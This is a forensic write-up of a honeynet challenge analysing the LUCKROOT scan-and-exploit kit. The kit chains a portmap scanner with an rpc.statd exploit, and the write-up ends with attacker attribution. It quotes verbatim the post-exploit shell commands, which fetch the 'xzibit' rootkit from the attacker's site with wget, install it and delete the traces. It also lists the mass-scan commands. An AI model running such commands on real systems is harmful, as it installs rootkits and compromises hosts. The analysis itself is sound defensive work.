Scan13, Max Vision <vision@whitehats.com>

1. What is the blackhat attempting to do with his command line syntax?

The intruder creates an obscure directory as a workspace (/usr/sbin/.mail) and downloads the LUCKROOT toolset from another web server under control of the attacker (becys.org). The filename is misleading as it is actually a gziped tar (.tar.gz or .tgz). The intruder extracts the tools and runs the luckgo script several times against various networks. The networks targeted were most likely randomly entered, however they map to the following:

command typed network attacked who owns it?
./luckgo 216 210 216.210.0.0/16 TotalNet Inc.
./luckgo 200 120 200.120.0.0/16 unallocated
./luckgo 64 120 64.120.0.0/16 unallocated
./luckgo 216 200 216.200.0.0/16 Abovenet Communications, Inc.
./luckgo 200 120 repeat
./luckgo 63 1 64.1.0.0/16 UUNET Technologies, Inc.
./luckgo 216 10 216.10.0.0/16 many class c allocations (various)
./luckgo 210 120
210.120.0.0/16 many class c allocations (Korean)
./luckgo 64 1
64.1.0.0/16 unallocated
./luckgo 216 1
216.1.0.0/16 several class c allocations
./luckgo 194 1
194.1.0.0/16 many class c allocations (Slovak Republic)
./luckgo 216 1 repeat
./luckgo 210 128
210.128.0.0/16 many class c allocations (Japan)
./luckgo 24 1 24.1.0.0/16 @Home Network (numerous regions)
./luckgo 12 20
12.20.0.0/16 many class c allocations (ATT)

Notice that the attacker would have scanned roughly 196k unallocated IP's (and 65k of those scanned twice) had the Honeynet firewall allowed the outbound connections, a considerable waste of resources and a clear illustration that much of the script kiddie behavior is random. Worse still, though less illustrative of their inefficiency, is that they would have scanned roughly 655k IPs in allocated space, possibly compromising hundreds of machines. A complete lists of affected networks is available upon request (vision@whitehats.com), but anyone can look these allocations up from ARIN.

2. What does the tool accomplish?

LUCKROOT is an exploit package composed of the following tools:

Tool Description
luckgo shell script
Runs luckscan-a against a network address range specified at the command line. If luckscan-a and luckstatdx program binaries are not present, this script will detect this and try to compile them from souce. If a scan.log file is present it is deleted.
luckscan-a  c source and binary
Network scanner that sweeps the specified IP range for a particular server using tcp connect (noisy full-connection). When called from the luckgo script, it will always scan for the portmap service at port 111. Each time the scanner finds a host running portmap, it launches luckstatdx passing the target IP as a parameter. (./luckstatdx -d 0 TARGET)
luckstatdx c source and binary
Rpc.statd remote exploit that can be used to run arbitrary code on the target server. When called from luckscan-a, this exploit will always use the default settings to attack Redhat 6.2. Upon gaining access on the target server, luckstatdx runs the following shell commands, which effectively trojan the remote system:
cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz


3. How does the tool work?

luckgo is a shell script that runs the scanner against a target network. The attacker runs the luckgo script with the first two octets of their intended victim network as the parameter. For example if they wished to scan and exploit 10.10.0.0/16, they would type "./luckgo 10 10". luckgo runs the scanner luckscan-a, which in turn runs the exploit luckstatdx against each target IP that is determined to have the portmap service running. The scanner makes no attempt to determine the operating system type or version before launching the exploit, so this shotgun approach is basically a blind mass-attack.

When a vulnerable target is found, the rpc.statd exploit is run against the host causing certain shell commands to be run on the remote server. These commands cause the victim to download and install a rootkit called "xzibit", which replaces system commands with the intention of hiding the intruder's presense and allowing remote access.

4. Is this tool a worm, or would you classify it as something else?

LUCKROOT is not a worm because it lacks an automated infection mechanism. This tool is used manually by an attacker to scan large network blocks for the rpc.statd vulnerability and exploit potential targets. This tool is a "scripted scan and exploit package".

5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

All tools in the LUCKROOT package are slight variations of existing tools. In the underground community this is called "ripping" and is an all-too-often occurance where one person takes "credit" for the work of another.

tool name original release what changed
luckgo

June 2000. Shell script included in VetesGirl's scanning tools that can be seen at http://www.self-evident.com/exploits/vetes/. There are several tool packages each with a different name, but using the same code. For example look at amdscanner.tar.gz for the file "/amd/massa/ama" and compare to luckgo.

The author credits were changed from "VetesGirl" to "BeCyS", and there were slight changes to the names of each program.
luckscan-a  June 2000. C program also included in VetesGirl's scanning tools from http://www.self-evident.com/exploits/vetes/. Using the same example from above, you can look at the file "/amd/massa/pscan-a.c" from amdscanner.tar.gz and compare to luckscan-a.c.
Instead of just displaying which targets have the open port, the program now exploits each target as well.
luckstatdx

August 2000. rpc.statd exploit written by ron1n, posted to Bugtraq as statdx.c.
http://www.securityfocus.com/archive/1/74148
Note that this is the old version of the exploit, there have been several other exploits since including an update from ron1n called statdx2.c, but for some reason attackers only seem to be using the older version.

Author credits have been changed from "ron1n" to "becys" and the commands run on the exploited target host have been altered to instead retrieve and install a rootkit.

Bonus Question:
What information can you obtain about who is using or created the tool?

The source IP address used in the attack wasn't shown in the challenge, but there are numerous clues to consider about the tool author from analysis of the tool.

Where the tools came from: The LUCKROOT.TAR package is downloaded from becys.org, a site which has only a shockwave intro with no further content. Inspection of the domain record shows that the domain was created last year using suspicious information - for example I called the contact phone number listed and the person had no idea about the becys.org domain. The contact address becys@yahoo.com address shows up in the domain record and becys@becys.org in the attack tool. Since the rootkit is still available for download from becys.org, it is somewhat likely that this host is controlled by the attacker (apparently BeCyS).

Credits in the attack tools: BeCyS, ReSpEkT, and coSes are mentioned in the tools as authors or references. I looked for each name in the large IRC networks, and found ReSpEkT on Undernet. I asked about BeCyS and through five minutes conversation was told that there are feuds between them and that BeCyS may have dropped ReSpEkT's name to get him in trouble. There was nothing conclusive here as it may all be the same individual, thought it would imply a higher level of deception and forethought than is evidenced by the use of the attack tools. ReSpEkT was in a channel with known Romanian blackhats who we have seen attack the honeynet before.

Rootkit configuration files: There are some preset variables in the xzibit.tar.gz rootkit downloaded from becys.org. Three address ranges are specified that will cause the trojaned system utilities to ignore traffic from certain networks, which are all in Romainia. One is the Romainian Education Network, and the other two appears to be .ro ISPs. Again assuming the attacker or attackers lack the sophistication to employ an elaborate decoy or framing operation, this would indicate the intruder is connecting from Romainia.

Max :)